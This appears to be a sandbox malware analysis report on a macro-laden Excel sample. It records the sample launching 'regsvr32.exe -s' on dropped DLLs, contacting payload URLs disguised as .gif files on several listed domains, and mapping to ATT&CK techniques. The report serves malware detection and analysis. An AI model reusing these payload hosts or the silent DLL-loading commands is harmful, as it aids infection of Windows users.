    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: classification engineClassification label: mal80.expl.evad.winXLSM@11/12@5/3
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{5BC391E4-5772-472A-9881-D96246A1904B} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 12345.xlsmReversingLabs: Detection: 16%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s ..\nvcoerf.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s ..\nvcoerf1.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s ..\nvcoerf2.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s ..\nvcoerf3.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s ..\nvcoerf4.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s ..\nvcoerf.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s ..\nvcoerf1.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s ..\nvcoerf2.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s ..\nvcoerf3.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s ..\nvcoerf4.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: 12345.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: 12345.xlsmInitial sample: OLE zip file path = xl/media/image2.png
    Source: 12345.xlsmInitial sample: OLE zip file path = xl/media/image3.png
    Source: 12345.xlsmInitial sample: OLE zip file path = xl/media/image4.png
    Source: 12345.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: 12345.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: 12345.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s ..\nvcoerf.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: regsvr32.exe, 00000001.00000002.675211595.0000000000DE0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.681353308.0000000003170000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.682417562.0000000004EB0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: regsvr32.exe, 00000001.00000002.675211595.0000000000DE0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.681353308.0000000003170000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.682417562.0000000004EB0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: regsvr32.exe, 00000001.00000002.675211595.0000000000DE0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.681353308.0000000003170000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.682417562.0000000004EB0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: regsvr32.exe, 00000001.00000002.675211595.0000000000DE0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.681353308.0000000003170000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.682417562.0000000004EB0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: Yara matchFile source: app.xml, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21DLL Side-Loading1Process Injection1Regsvr321OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsDLL Side-Loading1Masquerading1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    12345.xlsm17%ReversingLabsDocument-Excel.Trojan.Heuristic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    laura9630fr.com7%VirustotalBrowse
    mills-skyla30ec.com7%VirustotalBrowse
    jacktech.jackindia.com0%VirustotalBrowse
    velma-harber30ku.com7%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    http://moumitas.com/ds/0204.gif0%Avira URL Cloudsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    http://jacktech.jackindia.com/ds/0204.gif0%Avira URL Cloudsafe
    http://velma-harber30ku.com/gg.gif0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    laura9630fr.com
    8.211.4.209
    truetrueunknown
    mills-skyla30ec.com
    8.211.4.209
    truefalseunknown
    jacktech.jackindia.com
    103.205.143.227
    truefalseunknown
    velma-harber30ku.com
    8.211.4.209
    truefalseunknown
    moumitas.com
    74.208.236.90
    truefalse
      unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://moumitas.com/ds/0204.giffalse
      • Avira URL Cloud: safe
      unknown
      http://jacktech.jackindia.com/ds/0204.giffalse
      • Avira URL Cloud: safe
      unknown
      http://velma-harber30ku.com/gg.giffalse
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.comAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
        high
        https://login.microsoftonline.com/AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
          high
          https://shell.suite.office.com:1443AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
            high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
              high
              https://autodiscover-s.outlook.com/AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                high
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                  high
                  https://cdn.entity.AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://api.addins.omex.office.net/appinfo/queryAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                    high
                    https://clients.config.office.net/user/v1.0/tenantassociationkeyAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                      high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                        high
                        https://powerlift.acompli.netAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.comAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://lookup.onenote.com/lookup/geolocation/v1AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                          high
                          https://cortana.aiAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                            high
                            https://cloudfiles.onenote.com/upload.aspxAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                              high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                high
                                https://entitlement.diagnosticssdf.office.comAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                  high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                    high
                                    https://api.aadrm.com/AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                      high
                                      https://api.microsoftstream.com/api/AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                        high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                          high
                                          https://cr.office.comAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                            high
                                            https://portal.office.com/account/?ref=ClientMeControlAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                              high
                                              https://ecs.office.com/config/v2/OfficeAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                high
                                                https://graph.ppe.windows.netAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                  high
                                                  https://res.getmicrosoftkey.com/api/redemptioneventsAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://powerlift-frontdesk.acompli.netAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://tasks.office.comAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                    high
                                                    https://officeci.azurewebsites.net/api/AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/workAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                      high
                                                      https://store.office.cn/addinstemplateAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                        high
                                                        https://globaldisco.crm.dynamics.comAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                          high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                            high
                                                            https://store.officeppe.com/addinstemplateAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://dev0-api.acompli.net/autodetectAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.odwebp.svc.msAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://api.powerbi.com/v1.0/myorg/groupsAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                              high
                                                              https://web.microsoftstream.com/video/AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                high
                                                                https://graph.windows.netAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                  high
                                                                  https://dataservice.o365filtering.com/AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://officesetup.getmicrosoftkey.comAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://analysis.windows.net/powerbi/apiAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                    high
                                                                    https://prod-global-autodetect.acompli.net/autodetectAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://outlook.office365.com/autodiscover/autodiscover.jsonAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                      high
                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                        high
                                                                        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                          high
                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                            high
                                                                            https://ncus.contentsync.AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                              high
                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                high
                                                                                http://weather.service.msn.com/data.aspxAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                  high
                                                                                  https://apis.live.net/v5.0/AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                    high
                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                      high
                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                        high
                                                                                        https://management.azure.comAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                          high
                                                                                          https://wus2.contentsync.AA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://incidents.diagnostics.office.comAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                            high
                                                                                            https://clients.config.office.net/user/v1.0/iosAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                              high
                                                                                              https://insertmedia.bing.office.net/odc/insertmediaAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                high
                                                                                                https://o365auditrealtimeingestion.manage.office.comAA6A7A15-C192-4C5E-9786-60055125516D.0.drfalse
                                                                                                  high
